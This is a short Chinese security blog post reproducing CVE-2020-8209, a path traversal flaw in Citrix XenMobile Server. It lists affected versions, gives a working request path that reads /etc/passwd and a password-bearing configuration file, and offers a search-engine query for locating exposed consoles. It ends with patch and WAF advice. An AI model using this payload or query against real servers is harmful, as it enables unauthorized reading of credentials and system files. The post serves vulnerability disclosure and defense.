漏洞复现 CVE-2020-8209

  • A+
所属分类:安全文章

漏洞简介

        XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。

        CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。



影响范围

RP2之前的XenMobile服务器10.12RP4之前的XenMobile服务器10.11RP6之前的XenMobile服务器10.1010.9 RP5之前的XenMobile服务器


漏洞复现
poc:

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

复现成功:

/etc/passwd

漏洞复现 CVE-2020-8209

/opt/sas/sw/config/sftu.properties

漏洞复现 CVE-2020-8209

命中率还是挺高的:

app="XenMobile-控制台"

结果如图:

漏洞复现 CVE-2020-8209



修复建议

官方补丁会删除了/opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp,因此对help-sb-download.jsp的所有请求都可以视为非法请求,并且应被WAF阻止。

建议检查访问日志中是否有以前的请求。



参考

https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/


本文始发于微信公众号(don9sec):漏洞复现 CVE-2020-8209

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: